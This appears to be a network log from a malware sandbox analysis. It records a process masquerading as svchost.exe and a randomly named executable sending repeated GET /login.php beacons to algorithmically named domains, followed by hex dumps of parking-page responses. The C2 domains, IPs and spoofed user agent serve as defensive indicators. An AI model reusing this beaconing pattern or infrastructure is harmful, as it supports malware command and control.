                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.322647095 CET520INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                            Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTVhODhlYTAtMzZhNy00ZTRlLThmNjAtNWQxMTM5YjFkZjY1IiwicGFnZV90aW1lIjoxNzMxMzQ0ODgwLCJwYWdlX3VybCI6Imh0dHA6L


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            36192.168.2.95495699.83.170.3807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.936703920 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.365859032 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Location: https://puzylyp.com/login.php
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:00 GMT
                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            37192.168.2.95496285.17.31.82807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.509448051 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            38192.168.2.95496323.253.46.64807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.512057066 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.962601900 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:55 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.963182926 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            39192.168.2.955032103.224.212.210807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.343974113 CET277OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyxynyx.com
                                                                                                                                                                                                            Cookie: __tad=1731344868.1489616
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.918761015 CET244INHTTP/1.1 302 Found
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:08:09 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0408-095b-a6b9-e37a1a5effa6
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            40192.168.2.955033103.224.182.252807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.401809931 CET277OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vofycot.com
                                                                                                                                                                                                            Cookie: __tad=1731344868.1504633
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.967828035 CET242INHTTP/1.1 302 Found
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:08:09 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            location: http://ww16.vofycot.com/login.php?sub1=20241112-0408-09d4-8f1c-1de8890559b5
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            41192.168.2.955034199.59.243.227807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.930073023 CET404OUTGET /login.php?subid1=20241112-0408-095b-a6b9-e37a1a5effa6 HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww25.lyxynyx.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: __tad=1731344868.1489616; parking_session=07951af7-1a60-440f-a856-c66b7de487f9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.355655909 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:08:09 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1230
                                                                                                                                                                                                            x-request-id: 9017aeeb-e526-4341-b25a-9667617b2a28
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rSdCIc9if8BsoU4czH0lz6K66oDTHXf0N4Pgv1egLP+oQAFI0qCjVyPy+RlX0aLuyPQUcbiWVGvexw5nq5bk7g==
                                                                                                                                                                                                            set-cookie: parking_session=07951af7-1a60-440f-a856-c66b7de487f9; expires=Mon, 11 Nov 2024 17:23:10 GMT
                                                                                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 53 64 43 49 63 39 69 66 38 42 73 6f 55 34 63 7a 48 30 6c 7a 36 4b 36 36 6f 44 54 48 58 66 30 4e 34 50 67 76 31 65 67 4c 50 2b 6f 51 41 46 49 30 71 43 6a 56 79 50 79 2b 52 6c 58 30 61 4c 75 79 50 51 55 63 62 69 57 56 47 76 65 78 77 35 6e 71 35 62 6b 37 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rSdCIc9if8BsoU4czH0lz6K66oDTHXf0N4Pgv1egLP+oQAFI0qCjVyPy+RlX0aLuyPQUcbiWVGvexw5nq5bk7g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.355678082 CET656INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                            Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDc5NTFhZjctMWE2MC00NDBmLWE4NTYtYzY2YjdkZTQ4N2Y5IiwicGFnZV90aW1lIjoxNzMxMzQ0ODkwLCJwYWdlX3VybCI6Imh0dHA6L


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            42192.168.2.95503564.190.63.13680
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.993298054 CET348OUTGET /login.php?sub1=20241112-0408-09d4-8f1c-1de8890559b5 HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww16.vofycot.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: __tad=1731344868.1504633
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636183977 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:08:10 GMT
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            transfer-encoding: chunked
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_hNTn59GcRcmQBg/l9tawJx40dBXMve8vZ945/4/gF+3ErtUMvsR1Rx8reolQ2BmjNVkbBxEfg9ba+2E2Y6I68Q==
                                                                                                                                                                                                            last-modified: Mon, 11 Nov 2024 17:08:10 GMT
                                                                                                                                                                                                            x-cache-miss-from: parking-7596689c44-4sqbl
                                                                                                                                                                                                            server: Parking/1.0
                                                                                                                                                                                                            Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 68 4e 54 6e 35 39 47 63 52 63 6d 51 42 67 2f 6c 39 74 61 77 4a 78 34 30 64 42 58 4d 76 65 38 76 5a 39 34 35 2f 34 2f 67 46 2b 33 45 72 74 55 4d 76 73 52 31 52 78 38 72 65 6f 6c 51 32 42 6d 6a 4e 56 6b 62 42 78 45 66 67 39 62 61 2b 32 45 32 59 36 49 36 38 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_hNTn59GcRcmQBg/l9tawJx40dBXMve8vZ945/4/gF+3ErtUMvsR1Rx8reolQ2BmjNVkbBxEfg9ba+2E2Y6I68Q==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636204004 CET212INData Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d
                                                                                                                                                                                                            Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com h25as it all. We hope you find what you 570are searching for!"><lin
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636235952 CET1236INData Raw: 6b 0a 20 20 20 20 20 20 20 20 72 65 6c 3d 22 69 63 6f 6e 22 0a 20 20 20 20 20 20 20 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 0a 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f
                                                                                                                                                                                                            Data Ascii: k rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> /*! normalize.css v7.0.0 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-ms-text-size-
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636261940 CET1236INData Raw: 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 62 75 74 74 6f 6e 2c 68
                                                                                                                                                                                                            Data Ascii: ;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webk263Ait-appearance:button}button::-moz-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636276007 CET1236INData Raw: 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 68
                                                                                                                                                                                                            Data Ascii: ing:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__content-buybox{displ
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636291027 CET1236INData Raw: 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d
                                                                                                                                                                                                            Data Ascii: print__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-li
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636307001 CET1236INData Raw: 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a
                                                                                                                                                                                                            Data Ascii: t:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;pa
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636323929 CET1060INData Raw: 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d
                                                                                                                                                                                                            Data Ascii: border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636337996 CET1236INData Raw: 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 56 65 72 64 61 6e 61
                                                                                                                                                                                                            Data Ascii: translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-right:5%;padding-bottom:1
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.636353970 CET1236INData Raw: 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 63 6f 6e 74 61 69
                                                                                                                                                                                                            Data Ascii: rm:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-height:720px}.container-content--twot .
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.641261101 CET1236INData Raw: 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 66 64 38 30 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c
                                                                                                                                                                                                            Data Ascii: r}.webarchive-block__header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9f


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            43192.168.2.96221272.52.179.174807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.341985941 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyhub.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            44192.168.2.96221372.52.179.174807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.839596033 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyhub.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            45192.168.2.962366178.162.203.211804628C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.600913048 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
